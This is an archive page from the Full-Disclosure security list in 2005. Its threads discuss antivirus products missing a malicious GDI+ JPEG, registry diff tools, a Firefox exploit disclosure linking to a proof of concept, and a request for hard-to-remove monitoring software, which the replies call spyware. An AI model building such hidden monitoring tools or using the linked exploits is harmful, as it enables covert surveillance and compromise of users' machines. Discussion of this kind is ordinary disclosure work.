[Full-Disclosure] Re: Strange connection from google desktop search

2005-03-05 Thread Steve R
--- RandallM <[EMAIL PROTECTED]> wrote:
> The following established connection was noticed:
>  TCPxxx.xxx.x.xx:2869  64.233.187.104:80
>  ESTABLISHED 2824
> 
> Process viewer reported it to be:
> Googledesktop.exe
> 
> SamSpade says:
> 
> 03/05/05 21:54:31 whois  64.233.187.104
> I don't recognise any domain in 187.104, trying
> internic
> 
> whois -h whois.internic.net 187.104 ...
> 
> Whois Server Version 1.3
> 
> Domain names in the .com and .net domains can now be
> registered
> with many different competing registrars. Go to
> http://www.internic.net
> for detailed information.
> 
> No match for "187.104".
> 
> 03/05/05 22:07:21 finger @ 64.233.187.104
> finger @ 64.233.187.104 failed, no such host
> 
> 03/05/05 22:07:47 dns  64.233.187.104
> No DNS for this address
> (host doesn't exist)

FYI,

Output from ARIN WHOIS
Search results for: 64.233.187.104

OrgName:Google Inc. 
OrgID:  GOGL
Address:2400 E. Bayshore Parkway
City:   Mountain View
StateProv:  CA
PostalCode: 94043
Country:US

NetRange:   64.233.160.0 - 64.233.191.255 
CIDR:   64.233.160.0/19 
NetName:GOOGLE
NetHandle:  NET-64-233-160-0-1
Parent: NET-64-0-0-0-0
NetType:Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
Comment:
RegDate:2003-08-18
Updated:2004-03-05

TechHandle: ZG39-ARIN
TechName:   Google Inc. 
TechPhone:  +1-650-318-0200
TechEmail:  [EMAIL PROTECTED] 

OrgTechHandle: ZG39-ARIN
OrgTechName:   Google Inc. 
OrgTechPhone:  +1-650-318-0200
OrgTechEmail:  [EMAIL PROTECTED]

# ARIN WHOIS database, last updated 2005-03-05 19:10
# Enter ? for additional hints on searching ARIN's
WHOIS database.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11

2005-03-05 Thread RandallM
 
Andrey,
Just to add to the concern you bring up is what VirusTotal also shows on the
"Detection failures":
http://www.virustotal.com/flash/graficas/grafica4_en.html

Of course for me that's job security, but nonetheless it's pitiful. And now
in steps Microsoft with "Billions" under its belt, and I'll bet the odds
won't change much. That's where I get really confused.
We know that costs go into the billions when networks go down due to
infections. I know of no one but the parity actors for AOL who welcome
infections. I'm just dumbfounded by the abilities of virus companies to
battle this.

I'm finding that my preconceived label of who the virus writers are and look
like is rapidly being changed. I used to envision this lad with a tattered
Def Leppard shirt sitting with an old laptop in the wee early dawn finishing
up his code and getting ready to test it on the old grey Pentium box in the
corner.

Is this the guy beating the pants off the billion dollar companies?

I would also like to add that what you've done is very impressive. I'm
reading your paper now. I could not and will never be able to do such, so thanks for
this well written piece. Please tell me you're not wearing a Def Leppard
t-shirt!

thank you
Randall M

"If we ever forget that we're one nation under God, then we will be a nation
gone under." 
- Ronald Reagan
_

 


Andrey so correctly acknowledged:
--

Message: 8
Date: Fri,  4 Mar 2005 15:03:10 -0600
From: Andrey Bayora <[EMAIL PROTECTED]>
Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+
bug exploit Mutations - part 2
To: full-disclosure@lists.netsys.com
Cc: bugtraq@securityfocus.com
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=ISO-8859-1


The first part is here:
http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html

First, this post isn't about "how dangerous the GDI+ bug or a malicious JPEG
image is", but about "how good" your antivirus software is.

The issue is: only 1 out of 23 tested antivirus software products can detect the
malicious JPEG image (6 months after the public disclosure date).

Here is the link to the results, the JPEG file and my paper (GCIH practical)
that describes how to create this one:
http://www.hiddenbit.org/jpeg.htm

This one vendor (Symantec) that can detect it obviously does it with
"heuristic" detection (I don't work for them and didn't send them any
file; moreover, I know cases when Symantec didn't detect a virus that
"other" vendors did).
ClamAV antivirus detected this JPEG file 4 months ago, but strangely
can't detect it now.
What happened?
What about the 22 antivirus software vendors that miss this malicious JPEG?
The pattern or problem in these JPEG files is known and still many
antivirus software vendors miss it; can this represent the quality of their
heuristic engines?

OK, we know that any antivirus software can provide 100% protection...

P.S.  After my first post (October 14, 2004) about this problem, all
antivirus software vendors added detection for the demo file provided by
me in a couple of hours. Sadly for me, it seems that they prefer
"playing cat and mouse" and not improving heuristic engines...

Regards,
Andrey Bayora.
CISSP, GCIH

-

And so ends his thoughts






[Full-Disclosure] Re: Bypass of 22 Antivirus software with GDI+ bug exploit Mutations - part 2

2005-03-05 Thread "Vincent DUVERNET (Nolmë Informatique)"
Symantec found something that other editors didn't? Wow, impressive 
for a piece of software which let 700 malwares through on a PC ;p

About the Panda Software version, you've used an old version of Internet 
Security 2004, which is actually: 8.05.02 (didn't find anything either).
Internet Security 2005 is: 9.01.02

Andrey Bayora wrote:
> The first part is here:
> http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html
> First, this post isn't about "how dangerous the GDI+ bug or a malicious JPEG
> image is", but about "how good" your antivirus software is.
> The issue is: only 1 out of 23 tested antivirus software products can detect the
> malicious JPEG image (6 months after the public disclosure date).
> Here is the link to the results, the JPEG file and my paper (GCIH practical)
> that describes how to create this one:
> http://www.hiddenbit.org/jpeg.htm
> This one vendor (Symantec) that can detect it obviously does it with
> "heuristic" detection (I don't work for them and didn't send them any
> file; moreover, I know cases when Symantec didn't detect a virus that
> "other" vendors did).
> ClamAV antivirus detected this JPEG file 4 months ago, but strangely
> can't detect it now.
> What happened?
> What about the 22 antivirus software vendors that miss this malicious JPEG?
> The pattern or problem in these JPEG files is known and still many
> antivirus software vendors miss it; can this represent the quality of their
> heuristic engines?
> OK, we know that any antivirus software can provide 100% protection...
> P.S.  After my first post (October 14, 2004) about this problem, all
> antivirus software vendors added detection for the demo file provided by
> me in a couple of hours. Sadly for me, it seems that they prefer
> "playing cat and mouse" and not improving heuristic engines...
> Regards,
> Andrey Bayora.
> CISSP, GCIH
 




RE: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-05 Thread Aditya Deshmukh
>> No, it would be completely useless.  In case you didn't realise, the 
>> registry is not an ASCII text file, it's megabytes of unintelligible
>> binary gibberish.

>Since Windows 2000 regedit exports registry in an Unicode LE 
>text file. Not ASCII but quite intelligible text ;)

Yes, but win2k / winxp regedit can export both ASCII as well as UNICODE -
aditya





Re: [Full-Disclosure] re: Bios Programming...

2005-03-04 Thread Benjamin Franz
On Fri, 4 Mar 2005, Matt Marooney wrote:
> Most Important Requirements:
> 1. Multi-protocol monitoring (HTTP, FTP, Chat, File sharing,
> Newsreaders, etc.)
> 2. Thin application, does not *noticeably* interfere with normal
> computer operation
> 3. Difficult to remove (disregarding all hardware replacements,
> obviously, the person could go get a new computer) without a password
> Again, thanks for your helpful input.  I assure you, I am not trying to
> create more problems, and I am just like you guys when it comes to
> hatred of spyware.  I've been making a pretty decent living for years
> securing people's computers.

What you want is an IDS/firewall/DSL/cable modem gateway/router that packet 
sniffs for 'bad stuff' on the wire. They plug their computer into the 
gateway and it connects to the net through it.

That won't stop encrypted traffic, but most anything else should be 
manageable. There are probably off-the-shelf systems exactly like that 
already available ("corporate firewall appliances").

--
Benjamin Franz
"All right, where is the answer? The battle of wits has begun.
It ends when you click and we both serve pages - and find out who is right,
and who is slashdotted." - David Brandt


Re: [Full-Disclosure] re: Bios Programming...

2005-03-04 Thread Joachim Schipper
On 14:35 03/04/05 "Matt Marooney" <[EMAIL PROTECTED]> wrote:
> Okay, okay, guys...I  get all of your points.  I'm really glad
> I threw this idea out there  because you all have given me some really
> great reactions.  Thank you Bill  Humphries for your comments; you
> bring up some really good points.
> Now, getting back to  technical conversation, the most important
> requirement for this software is the  multi-protocol monitoring.  As
> some of you have said, this is not going to  be able to be done with a
> small program.
> I don't mind letting  the user know he/she is being monitored, and I
> do not intend for this utility to  be used to spy on someone without
> their knowledge.  I guess I didn't  explain that very well before.
> So, with that out of  the way, I'd like the program to run in the
> background, and be slim enough that  it does not noticeably slow down
> the user's computer.  This is to avoid the  person coming to the
> recovery group and saying, "I had to uninstall the monitor  because it
> is slowing down my computer".
> Most Important  Requirements:
>
> 1. Multi-protocol  monitoring (HTTP, FTP, Chat, File sharing,
> Newsreaders,  etc.)
> 2. Thin application,  does not *noticeably* interfere with normal
> computer  operation
> 3. Difficult to  remove (disregarding all hardware replacements,
> obviously, the person could go  get a new computer) without a
> password Again, thanks for  your helpful input.  I assure you, I am
> not trying to create more problems,  and I am just like you guys when
> it comes to hatred of spy ware.  I've been  making a pretty decent
> living for years securing people's computers.
> --  Matt
>

Of course, a relatively simple solution would involve giving them a free
internet connection, and a modified ADSL/Cable modem... some of the smarter
appliances might be able to do what you describe. Failing that, get
yourself a simple Linux install. Strip it of all shells and run only those
few programs necessary for connection plus Snort. Now get some ISP to
cooperate and only give *you* the connection passwords, then install the
Linux box as a gateway. Anyone unable to crack the Linux box will not be
able to connect via this particular ISP anymore; if you want to be
reasonably secure, make the box ask for a password-protected decryption key
at boot, and make sure only a select few people have these disks. However,
this is burdensome. A simpler alternative is either pinging them or having
them ping you to ensure they are not taken down for protracted periods.

Note that the above scheme can be defeated easily by a knowledgeable user
unless you use the decryption floppy scheme, and even in that case, it is
pretty easy to get a second connection (or encrypt traffic, or whatever)...
but both require some work, hopefully enough to make them reconsider.

This is more up-front, and possibly more effective, than the spyware you
were originally proposing (yes, it is spyware. Your goals may be considered
noble by some, but it would still be spyware).

Also note that the whole idea may, depending on who you ask, be technically
flawed and morally wrong.

 Joachim



[Full-Disclosure] re: Bios Programming...

2005-03-04 Thread Matt Marooney
Okay, okay, guys... I get all of your points.  I'm really glad I threw this idea out there
because you all have given me some really great reactions.  Thank you Bill
Humphries for your comments; you bring up some really good points.

Now, getting back to technical conversation, the most important requirement for this software is the
multi-protocol monitoring.  As some of you have said, this is not going to
be able to be done with a small program.

I don't mind letting the user know he/she is being monitored, and I do not intend for this utility to
be used to spy on someone without their knowledge.  I guess I didn't
explain that very well before.

So, with that out of the way, I'd like the program to run in the background, and be slim enough that
it does not noticeably slow down the user's computer.  This is to avoid the
person coming to the recovery group and saying, "I had to uninstall the monitor
because it is slowing down my computer".

Most Important Requirements:

1. Multi-protocol monitoring (HTTP, FTP, Chat, File sharing, Newsreaders, etc.)

2. Thin application, does not *noticeably* interfere with normal computer operation

3. Difficult to remove (disregarding all hardware replacements, obviously, the person could go
get a new computer) without a password

Again, thanks for your helpful input.  I assure you, I am not trying to create more problems,
and I am just like you guys when it comes to hatred of spyware.  I've been
making a pretty decent living for years securing people's computers.

-- 
Matt
 


[Full-Disclosure] Re: Windows Registry Analyzer

2005-03-04 Thread Raoul Nakhmanson-Kulish
Hello, Dave Korn!
> No, it would be completely useless.  In case you didn't realise, the 
> registry is not an ASCII text file, it's megabytes of unintelligible
> binary gibberish.
Since Windows 2000, regedit exports the registry as a Unicode LE text file. 
Not ASCII, but quite intelligible text ;)

--
Best regards,
Raoul Nakhmanson-Kulish
Elfor Soft Ltd.,
IT Department
http://www.elforsoft.ru/


RE: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-04 Thread Ron DuFresne


Does Symantec not have a tool in the SystemWorks package that does
exactly what he asks, as well as the ability to roll back the reg?


Thanks,

Ron DuFresne



On Thu, 3 Mar 2005, Handy, Mark (IT) wrote:

> Surely you can simply export before and after your action and use
> windiff on the two files
>
> Mark Handy
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Eric
> Windisch
> Sent: 03 March 2005 21:48
> To: Dave Korn
> Cc: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Re: Windows Registry Analyzer
>
> On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
> >   No, it would be completely useless.  In case you didn't realise, the
>
> > registry is not an ASCII text file, it's megabytes of unintelligible
> > binary gibberish.
>
> The registry can be exported to ASCII text, edited, and re-imported.
> Have you ever opened a .reg file?
>
>
> --
> Eric Windisch <[EMAIL PROTECTED]>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




RE: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Handy, Mark (IT)
Surely you can simply export before and after your action and use
windiff on the two files

Mark Handy

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Eric
Windisch
Sent: 03 March 2005 21:48
To: Dave Korn
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Re: Windows Registry Analyzer

On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
>   No, it would be completely useless.  In case you didn't realise, the

> registry is not an ASCII text file, it's megabytes of unintelligible 
> binary gibberish.

The registry can be exported to ASCII text, edited, and re-imported.
Have you ever opened a .reg file?


--
Eric Windisch <[EMAIL PROTECTED]>



Re: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Eric Windisch
On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
>   No, it would be completely useless.  In case you didn't realise, the
> registry is not an ASCII text file, it's megabytes of unintelligible binary
> gibberish.

The registry can be exported to ASCII text, edited, and re-imported.
Have you ever opened a .reg file?


-- 
Eric Windisch <[EMAIL PROTECTED]>



Re: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Michael Holstein

>   No, it would be completely useless.  In case you didn't realise, the
> registry is not an ASCII text file, it's megabytes of unintelligible binary
> gibberish.
True, but there are many programs (the Linux Registry Editor, for 
example) that can open it.

http://developer.berlios.de/projects/tlr-regedit
~Mike.


Re: [Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Michael Holstein

>   Yes, absolutely.  It's called "InCtrl5" and it is *exactly* what you both
> want.
Found it:
http://publicdata.home.comcast.net/inctrl5.zip
Also note: this is Plugin #56 on BartPE (which would be quite useful 
for forensics -- you could boot the undisturbed system under BART, grab 
a snapshot, do (x), and grab a comparison snapshot again under BART -- 
thus avoiding all the other volatile crud that changes between Windows 
reboots).

~Mike.


[Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Dave Korn
"Cassidy Macfarlane" wrote in message
news:[EMAIL PROTECTED]
> You can, of course, use regmon (sysinternals.com) to monitor the
> registry 'live' while changes are being made, however it sounds like you
> want a product that would analyse the reg, then re-analyse after
> installation, and report on changes.
>
> This would indeed be a handy tool.  Anyone know of anything better than
> regmon for this purpose?

  Yes, absolutely.  It's called "InCtrl5" and it is *exactly* what you both
want.

  You run it once, it snapshots the state of the registry, the entire
contents of your HD, and the content of all the various text files such as
autoexec.bat / win.ini / boot.ini / autoexec.nt (etc).  Then it exits.  You
install whatever it is you wanted to install, then run it again; it takes
another snapshot, then compares the two and makes you a nice report showing
*every* change to your system - registry keys and values added, deleted or
modified; files and directories added, deleted or modified; and any changes
to those startup-script text files.

  It needn't be an install.  It'll tell you whatever differences there are
between the before and after snapshots.  What you do in between those two
times is up to you.  For instance it's quite interesting to take a snapshot,
do a reboot, and run the comparison when the machine boots up again, to see
how much volatile stuff gets changed every time you reboot windows.  Or you
can *un*install something, and by checking against the original installation
report (or by snapshotting, installing, running, then uninstalling the app
straight away before finally getting the comparison report) see if it's left
any traces behind.

  It's incredibly useful.  You'll have to google for it though.  It was
originally given away by some PC magazine or other, but they've restricted
access to their archives now.  See what you can find.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today



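An added example, not code from this thread, from InCtrl5 or from windiff, that does the before/after comparison Mark Handy and Dave Korn describe on plain regedit exports: it parses two .reg files (the Unicode LE format Raoul mentions or the older ANSI REGEDIT4 format) and reports keys and values added, deleted or modified between the two snapshots. The two exports below are constructed sample data, not captures from a real machine, and the key names in them are illustrative.

```python
"""Before/after comparison of regedit exports (.reg files).

Added example, not code from this thread or from InCtrl5: export the registry,
do the install (or reboot, or uninstall), export again, then diff the two
exports key by key instead of reading windiff output.  The two exports at the
bottom are constructed sample data, not real captures.
"""
import re

# regedit on Windows 2000+ writes UTF-16LE with a BOM ("Windows Registry
# Editor Version 5.00"); older exports are ANSI and start with "REGEDIT4".
def decode_reg(data: bytes) -> str:
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")      # the utf-16 codec strips the BOM
    return data.decode("latin-1")

# Match  "Name"=value  or  @=value  (@ is the key's default value).
VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')

def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: raw_value_text}}.

    Values stay as the raw text regedit wrote ("...", dword:..., hex:...)
    because the diff only needs to know whether they changed.
    """
    snapshot = {}
    current = None
    lines = iter(text.splitlines())
    for line in lines:
        # regedit wraps long hex values over several lines with a trailing "\"
        while line.rstrip().endswith("\\"):
            line = line.rstrip()[:-1] + next(lines, "").strip()
        line = line.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):        # [-key] deletes a key; not a snapshot entry
                current = None
            else:
                current = snapshot.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else m.group(2)
            current[name] = m.group(3)
    return snapshot

def diff_snapshots(before: dict, after: dict) -> dict:
    """Compare two parsed exports; tuples are (key, name, value[, new_value])."""
    report = {"keys_added": [], "keys_deleted": [], "values_added": [],
              "values_deleted": [], "values_modified": []}
    for key in sorted(set(before) | set(after)):
        if key not in before:
            report["keys_added"].append(key)
            report["values_added"] += [(key, n, v) for n, v in sorted(after[key].items())]
        elif key not in after:
            report["keys_deleted"].append(key)
            report["values_deleted"] += [(key, n, v) for n, v in sorted(before[key].items())]
        else:
            b, a = before[key], after[key]
            for name in sorted(set(b) | set(a)):
                if name not in b:
                    report["values_added"].append((key, name, a[name]))
                elif name not in a:
                    report["values_deleted"].append((key, name, b[name]))
                elif a[name] != b[name]:
                    report["values_modified"].append((key, name, b[name], a[name]))
    return report

def diff_reg_exports(before_bytes: bytes, after_bytes: bytes) -> dict:
    return diff_snapshots(parse_reg(decode_reg(before_bytes)),
                          parse_reg(decode_reg(after_bytes)))

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed "before" export in the Windows 2000+ Unicode format.
BEFORE_REG = (
    "\ufeffWindows Registry Editor Version 5.00\r\n\r\n"
    f"[{RUN_KEY}]\r\n"
    '"Sync"="C:\\\\Program Files\\\\Sync\\\\sync.exe"\r\n\r\n'
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example\\Setting]\r\n"
    '@="default"\r\n'
    '"Level"=dword:00000001\r\n'
).encode("utf-16-le")

# Constructed "after" export in the older ANSI REGEDIT4 format, with one new
# Run entry, one changed value and one new key holding a wrapped hex value.
AFTER_REG = (
    "REGEDIT4\r\n\r\n"
    f"[{RUN_KEY}]\r\n"
    '"Sync"="C:\\\\Program Files\\\\Sync\\\\sync.exe"\r\n'
    '"Updater"="C:\\\\Program Files\\\\Example\\\\updater.exe"\r\n\r\n'
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example\\Setting]\r\n"
    '@="default"\r\n'
    '"Level"=dword:00000002\r\n\r\n'
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example\\New]\r\n"
    '"Path"=hex:43,3a,5c,\\\r\n'
    "  54,65,6d,70\r\n"
).encode("latin-1")

if __name__ == "__main__":
    for section, entries in diff_reg_exports(BEFORE_REG, AFTER_REG).items():
        for entry in entries:
            print(f"{section}: {entry}")
```

Exporting the whole hive set with regedit before and after an action and feeding both files to diff_reg_exports gives the registry half of the InCtrl5 report; new entries under the Run key are the lines worth reading first.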


[Full-Disclosure] Re: Windows Registry Analyzer

2005-03-03 Thread Dave Korn
"Eric Windisch" wrote in message news:[EMAIL PROTECTED]
> Perhaps this is just the Unix user in me, but I ask:
> How about just making a copy of the registry on boot (or at intervals)
> and compare it to the last copy?
>
> Note that the following example is untested, but should be mostly
> accurate.

  No, it would be completely useless.  In case you didn't realise, the
registry is not an ASCII text file, it's megabytes of unintelligible binary
gibberish.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today





Re: [Full-Disclosure] Re: test

2005-03-03 Thread xyberpix
no way, really?

On Wed, 2 March, 2005 22:37, Roberto Arias said:
> Ignore this message. Testing the maillist
>
> pingywon wrote:
>> not too /Smart/ you are John
>>
>> - Original Message -
>> *From:* John Smart 
>> *To:* full-disclosure@lists.netsys.com
>> 
>> *Sent:* Wednesday, March 02, 2005 1:41 PM
>> *Subject:* [Full-Disclosure] test
>>
>> test
>>


-- 
For security and Opensource news check out:
http://www.xyberpix.com



[Full-Disclosure] Re: test

2005-03-02 Thread Roberto Arias
Ignore this message. Testing the maillist
pingywon wrote:
not too /Smart/ you are John
- Original Message -
*From:* John Smart 
*To:* full-disclosure@lists.netsys.com

*Sent:* Wednesday, March 02, 2005 1:41 PM
*Subject:* [Full-Disclosure] test
test



[Full-Disclosure] Re: Full-Disclosure Digest, Vol 3, Issue 52

2005-02-28 Thread Wiggert de Haan
Dear reader,

From 28 February up to and including 4 March I am out of the office. Your mail has arrived
and will be answered from 7 March onwards.

For urgent matters you can contact Gijs van Blokland.
[EMAIL PROTECTED] / 020-5304323

Wiggert de Haan
ISIZ BV


Re: [Full-Disclosure] RE: Firescrolling [Firefox 1.0]

2005-02-26 Thread Niek
On 2/25/2005 6:36 PM +0100, Eric McCarty wrote:
> Confirmed Exploit works in Firefox 1.0
OT guy already confirmed this; why are we reading your useless email?


[Full-Disclosure] Re: Firescrolling [Firefox 1.0]

2005-02-26 Thread mikx
Is fixed as part of mfsa 2005-27
http://www.mozilla.org/security/announce/mfsa2005-27.html
mikx
- Original Message - 
From: "Stan Bubrouski" <[EMAIL PROTECTED]>
To: "Beauford, Jason" <[EMAIL PROTECTED]>
Cc: "mikx" <[EMAIL PROTECTED]>; ; 
; <[EMAIL PROTECTED]>
Sent: Friday, February 25, 2005 10:33 PM
Subject: Re: Firescrolling [Firefox 1.0]


looked at: 
http://www.mozilla.org/projects/security/known-vulnerabilities.html

Are you sure it's fixed???
-sb
Beauford, Jason wrote:
That sucked.
Fortunately:  http://www.mozilla.org/products/firefox/releases/
jmb
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]
__Summary
Remember my Internet Explorer "scrollbar exploit" based on http-equiv's 
"What a Drag"? When will people ever learn that "unusual user
interaction" can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.
__Proof-of-Concept
http://www.mikx.de/firescrolling/
__Status
The exploit is based on multiple vulnerabilities:
bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)
Upgrade to Firefox 1.0.1 or disable javascript.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software
Tested with Firefox 1.0 on Windows and Linux (Fedora Core)
__Contact Informations
Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11
mikx




[Full-Disclosure] Re: Firescrolling [Firefox 1.0]

2005-02-25 Thread Stan Bubrouski
looked at: 
http://www.mozilla.org/projects/security/known-vulnerabilities.html

Are you sure it's fixed???
-sb
Beauford, Jason wrote:
That sucked.
Fortunately:  http://www.mozilla.org/products/firefox/releases/
jmb
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary
Remember my Internet Explorer "scrollbar exploit" based on http-equiv's 
"What a Drag"? When will people ever learn that "unusual user
interaction" 
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary 
code by dragging a scrollbar two times.

__Proof-of-Concept
http://www.mikx.de/firescrolling/
__Status
The exploit is based on multiple vulnerabilities:
bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)
Upgrade to Firefox 1.0.1 or disable javascript.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software
Tested with Firefox 1.0 on Windows and Linux (Fedora Core)
__Contact Informations
Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11
mikx



[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

2005-02-25 Thread Andrade, Leonardo F. Buonsanti de (BR - IT Brazil)
Yes. It works on Firefox 1.0

-Original Message-
From: Eric McCarty [mailto:[EMAIL PROTECTED] 
Sent: Friday, 25 February 2005 14:37
To: mikx; full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: RE: Firescrolling [Firefox 1.0]

Confirmed Exploit works in Firefox 1.0, however on a side note Microsoft
Anti-spyware prevented the script from executing.



Eric McCarty
Systems Administrator
Internet Security Officer


 

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 12:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's
"What a Drag"? When will people ever learn that "unusual user
interaction" 
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Informations

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx 
 


Re: [Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Esler, Joel CNTR/Sytex




While I agree that this is an issue, I don't feel it's a security issue.  It's more a "fix the driver, damn it" issue...  

If you can go through all the trouble to set up a camera, or physically sit and see a few seconds' worth of XFree blink...  you most likely have physical access anyway.  

Physical Access = root.

Fix the driver.  End of story.

On Fri, 2005-02-25 at 22:58 +0300, phased wrote:


If someone has access to your machine, and can make it crash so they can see
what you were doing (someone mentioned this is local information disclosure),
they could just look over your shoulder while you were using the machine or 
install a mini camera someplace in the room, zoom in on your monitor and
achieve much better results.

-Original Message-
From: Stan Bubrouski <[EMAIL PROTECTED]>
To: "Riad S. Wahby" <[EMAIL PROTECTED]>
Date: Fri, 25 Feb 2005 13:33:21 -0500
Subject: [Full-Disclosure] Re: Xfree86 video buffering?

> 
> Riad S. Wahby wrote:
> 
> >Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> >  
> >
> >>Umm I didn't offer a solution at all? 
> >>
> >>
> >
> >Are you making a statement or asking a question?
> >
> >  
> >
> Umm more like wondering what you're talking about.
> 
> >>I clearly said I wasn't wise enough to devise a solution for this...
> >>which is why I said I'll leave a solution to the experts...
> >>
> >>
> >
> >It's fairly obvious that you either have to do it at shutdown or at
> >startup.  When else are you going to do it, while the user is viewing
> >the screen?
> >
> >  
> >
> I wasn't making a case for either argument.
> 
> >Also, you seem to have taken my email as a personal attack.  Calm down,
> >dude.  I was participating in a discussion, not holding up a giant "Stan
> >is stupid" sign.
> >
> >  
> >
> Go ahead and hold up a sign doesn't bother me, if it did I wouldn't be 
> posting to public mailing lists.
> But if you think I'm sitting here steaming about it you're barking up the 
> wrong tree :-P
> 
> I think you're simply inferring too much from what I'm saying.  That's all.
> 
> Best Regards,
> 
> sb
> 
-- 
Esler, Joel CNTR/Sytex <[EMAIL PROTECTED]>


Re: [Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread phased

If someone has access to your machine, and can make it crash so they can see
what you were doing, someone mentioned this is local information disclosure...
they could just look over your shoulder while you were using the machine or
install a mini camera someplace in the room, zoom in on your monitor and
achieve much better results.

-Original Message-
From: Stan Bubrouski <[EMAIL PROTECTED]>
To: "Riad S. Wahby" <[EMAIL PROTECTED]>
Date: Fri, 25 Feb 2005 13:33:21 -0500
Subject: [Full-Disclosure] Re: Xfree86 video buffering?

> 
> Riad S. Wahby wrote:
> 
> >Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> >  
> >
> >>Umm I didn't offer a solution at all? 
> >>
> >>
> >
> >Are you making a statement or asking a question?
> >
> >  
> >
> Umm more like wondering what you're talking about.
> 
> >>I clearly said I wasn't wise enough to devise a solution for this...
> >>which is why I said I'll leave a solution to the experts...
> >>
> >>
> >
> >It's fairly obvious that you either have to do it at shutdown or at
> >startup.  When else are you going to do it, while the user is viewing
> >the screen?
> >
> >  
> >
> I wasn't making a case for either argument.
> 
> >Also, you seem to have taken my email as a personal attack.  Calm down,
> >dude.  I was participating in a discussion, not holding up a giant "Stan
> >is stupid" sign.
> >
> >  
> >
> Go ahead and hold up a sign doesn't bother me, if it did I wouldn't be 
> posting to public mailing lists.
> But if you think I'm sitting here steaming about it you're barking up the 
> wrong tree :-P
> 
> I think you're simply inferring too much from what I'm saying.  That's all.
> 
> Best Regards,
> 
> sb
> 


[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

